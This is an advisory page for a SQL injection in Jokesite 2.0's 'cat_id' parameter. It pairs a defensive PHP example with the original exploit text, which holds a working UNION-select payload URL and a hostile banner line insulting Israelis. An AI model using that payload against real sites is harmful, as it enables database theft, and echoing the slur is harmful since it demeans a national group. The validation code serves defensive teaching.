Vendor: Jokesite
By: Cyb3r-1sT
CVSS: 9.3 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Jokesite
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: CVE-2009-4456
CPE: a:scriptdemo:jokesite:2.0
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Jokesite 2.0 SQL Injection

Jokesite 2.0 is vulnerable to SQL injection because the 'cat_id' parameter of the 'jokes_category.php' script is not properly validated. An attacker who sends a specially crafted HTTP request with a malicious 'cat_id' value can execute arbitrary SQL commands and gain access to the database.

Mitigation:

Upgrade to the latest version of Jokesite 2.0.
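
The input handling the description says is missing for 'cat_id', as an added example in PHP (not Jokesite's code and not the vendor's patch). The table `jokes`, its columns and both function names are hypothetical, and an in-memory SQLite database stands in for the site's real database so the script runs offline.

```php
<?php
declare(strict_types=1);

// Added example, not Jokesite's own code. The table `jokes` and its columns
// are hypothetical; an in-memory SQLite database stands in for the real one.

/** Accept cat_id only as a positive decimal integer; anything else is null. */
function parse_cat_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;                      // arrays (cat_id[]=1) or a missing value
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Fetch a category's jokes with the value bound, never concatenated. */
function jokes_in_category(PDO $db, int $catId): array
{
    $stmt = $db->prepare('SELECT id, title FROM jokes WHERE category_id = :cat ORDER BY id');
    $stmt->bindValue(':cat', $catId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jokes (id INTEGER PRIMARY KEY, title TEXT, category_id INTEGER)');
$db->exec("INSERT INTO jokes (title, category_id) VALUES ('first', 3), ('second', 3), ('other', 4)");

// Constructed inputs as they would arrive in $_GET['cat_id'] (URL-decoded).
// The third is the cat_id value from the advisory text on this page.
$samples = [
    '3',
    '4',
    "-99999999' union select 0,1,2,3,database(),5,6,7,8,9,10,user(),12/*",
    '3 OR 1=1',
    '',
];
foreach ($samples as $raw) {
    $catId = parse_cat_id($raw);
    if ($catId === null) {
        echo 'rejected (answer with HTTP 400): ' . json_encode($raw) . PHP_EOL;
        continue;
    }
    echo "cat_id=$catId -> " . count(jokes_in_category($db, $catId)) . ' joke(s)' . PHP_EOL;
}
```

Validation and binding are kept as two separate layers on purpose: the bound parameter keeps the query structure fixed even if a later change loosens the integer check.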

Exploit-DB raw data:

                         ||          ||   | ||        
                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                 ( :   /    (_)    /           (   . 

                   ================================
                      ==========================
                         ==================== 
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact :  t3tto0 [at] yahoo.com

                 cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am 


=======================================================
+++++++++++++ R3membeR Kings of injection +++++++++++++
=======================================================


<<->> script : jokesite 2.0

<<->> download : www.scriptdemo.com/php-jokesite/ver2.0  


=======================================================
++++++++++++++++ pwning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk    : find it

<<->> Exploit :>>>>>>>>>
                  www.site.me/jokes_category.php?cat_id=-99999999'+union+select+0,1,2,3,database(),5,6,7,8,9,10,user(),12/*

 
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
                          anaconda-ksa $ Brightdark $ sirus $ crazy-x  and all freinds

<<->> InjEctOr5 TeaM  


<<->> All muslims

# milw0rm.com [2008-05-20]